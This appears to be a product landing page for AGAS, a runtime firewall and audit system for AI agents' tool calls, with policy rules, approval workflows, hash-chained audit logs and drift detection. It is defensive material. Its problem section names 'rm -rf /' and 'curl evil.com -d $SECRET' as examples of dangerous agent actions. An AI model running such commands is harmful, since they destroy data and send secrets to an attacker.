Runtime firewall for AI agents.

Every tool call goes through AGAS before it executes. Policy evaluation, human approval workflows, cryptographic audit trails, and real-time monitoring — so you always know what your agents did and why.

Works with Claude Code, OpenAI Agents SDK, Vercel AI SDK, LangChain, CrewAI, AutoGen, MCP, or any callable.

The problem

Your agent has shell access and you have no idea what it's doing.

No execution control

Agent calls rm -rf / or curl evil.com -d $SECRET. By the time you see the log, the damage is done.

No audit trail

Logs say "tool X was called at 14:32". Not why the agent chose it, what it considered, or whether the result matched what was authorized.

No approval flow

Dangerous operations execute immediately. No way to require human sign-off before a deployment, database write, or file deletion.

What's built

Everything you need to control agents.

Policy evaluation, approval workflows, cryptographic audit trails, real-time monitoring, drift detection, and policy replay. All through a single API.

Policy Engine

YAML rules with pattern matching, wildcard support, and first-match-wins evaluation. Per-agent profiles with allowed/denied tool lists. Default deny.

rules:
  - name: "allow-reads"
    match:
      action: "read|get|list"
    decision: "allow"

  - name: "approve-writes"
    match:
      agent_id: "claude-code:*"
      action: "write"
    decision: "approve"

  - name: "deny-destructive"
    match:
      action: "delete|drop|remove"
    decision: "deny"

Human Approval Workflows

Flag risky operations for human review before they execute. Approve or deny from the dashboard or API. Agents wait for a decision.

POST /api/v1/actions
  -> { decision: "pending_approval" }

# Human reviews in dashboard...

POST /api/v1/actions/:id/approve
  -> { state: "approved" }

# Agent proceeds with execution

Cryptographic Audit Trail

Every decision is HMAC-SHA256 signed and hash-chained per agent. Detect tampering, verify integrity, and replay decisions against current policy.

GET /api/v1/chain/verify?agent_id=analyst-1
{
  "valid": true,
  "chain_length": 847,
  "gaps": [],
  "first": "2026-01-15T...",
  "last": "2026-03-05T..."
}
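A minimal sketch of how a per-agent HMAC-SHA256 hash chain catches edited and deleted records, added here as an illustration and not AGAS's own code. The record fields, the key handling and the `invalid` field are assumptions; `valid`, `chain_length` and `gaps` mirror the response above.

```python
import hashlib
import hmac
import json

KEY = b"constructed-demo-key"  # constructed; a real signing key belongs in a KMS/HSM
GENESIS = "0" * 64  # assumed "prev" value for the first record of a chain


def _mac(key, body):
    # Canonical JSON so signer and verifier MAC identical bytes.
    msg = json.dumps(body, sort_keys=True, separators=(",", ":")).encode()
    return hmac.new(key, msg, hashlib.sha256).hexdigest()


def append(chain, key, agent_id, tool, decision):
    """Append a decision record that commits to the previous record's MAC."""
    body = {"seq": len(chain), "agent_id": agent_id, "tool": tool,
            "decision": decision,
            "prev": chain[-1]["mac"] if chain else GENESIS}
    chain.append({**body, "mac": _mac(key, body)})


def verify(chain, key):
    """Walk the chain once, reporting sequence gaps and records that fail."""
    gaps, invalid, prev, want = [], [], GENESIS, 0
    for rec in chain:
        body = {k: v for k, v in rec.items() if k != "mac"}
        if rec["seq"] != want:  # records removed or reordered
            gaps.append({"expected": want, "found": rec["seq"]})
        linked = rec["prev"] == prev
        signed = hmac.compare_digest(rec["mac"], _mac(key, body))
        if not (linked and signed):
            invalid.append(rec["seq"])
        prev, want = rec["mac"], rec["seq"] + 1
    return {"valid": not gaps and not invalid, "chain_length": len(chain),
            "gaps": gaps, "invalid": invalid}


if __name__ == "__main__":
    log = []  # constructed sample decisions
    for tool, decision in [("file_read", "allow"), ("shell_exec", "deny"),
                           ("db_write", "approve"), ("file_read", "allow")]:
        append(log, KEY, "analyst-1", tool, decision)
    print(verify(log, KEY))
    log[1]["decision"] = "allow"  # after-the-fact edit of a denied action
    print(verify(log, KEY))
```

A chain verified this way cannot reveal truncation of its tail on its own, so the latest MAC and chain length need to be recorded somewhere the log writer cannot rewrite.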

Real-time Event Stream

SSE endpoint streams every decision as it happens. Build dashboards, trigger alerts, or pipe events to your SIEM.

GET /api/v1/events (SSE)

event: action.allowed
data: {"tool":"file_read","agent_id":"analyst-1"}

event: action.denied
data: {"tool":"shell_exec","agent_id":"deploy-bot"}

event: action.pending_approval
data: {"tool":"db_write","agent_id":"analyst-1"}

Drift & Anomaly Detection

Detect behavioral shifts automatically. Denial rate spikes, new tool usage, volume anomalies, and slow execution patterns.

GET /api/v1/insights/drift?agent_id=analyst-1
{
  "denial_rate_change": "+340%",
  "new_tools": ["shell_exec", "network_fetch"],
  "period": "7d",
  "severity": "high"
}

Policy Replay

Re-evaluate any historical decision against your current policy. See what would change if you tighten or loosen rules.

GET /api/v1/replay/act_7kQ2x
{
  "original_decision": "allowed",
  "replayed_decision": "deny",
  "matched_rule": "deny-destructive",
  "drift": true
}

Integration

Works with your existing stack.

Add governance to your agent's tool loop. Your agent code stays the same — AGAS plugs in at the boundary.

for tc in msg.tool_calls:
  args = json.loads(tc.function.arguments)

  # Submit to AGAS — one line
  decision = agas.submit(
    tool=tc.function.name,
    args=args,
    reasoning_context=msg.content,
  )

  if decision.allowed:
    result = tool_functions[tc.function.name](**args)
    decision.report_result(result)
  else:
    result = f"Blocked: {decision.reason}"

Comparison

How AGAS compares.

Agent firewalls protect the network layer. AGAS protects the decision layer. They're complementary — use both for defense in depth.

Capability | Nothing | System prompts | Agent firewall | AGAS
What it is | Hope | Instructions | Network firewall | Runtime control plane
Pre-execution policy | No | No | Tool-level only | Per-agent, per-tool, per-action
Human approval flow | No | No | No | Built-in (dashboard + API)
Cryptographic audit | No | No | Signed logs | HMAC-SHA256 hash chains
Tamper detection | No | No | Partial | Full chain verification
Policy replay | No | No | No | Re-evaluate any decision
Drift detection | No | No | Session profiling | Behavioral drift + anomalies
Multi-tenant | No | No | Agent ID header | Full tenant isolation
Real-time events | No | No | Webhook/syslog | SSE stream + webhooks

Be the first to try AGAS.

Join the waitlist and we'll let you know as soon as access is available.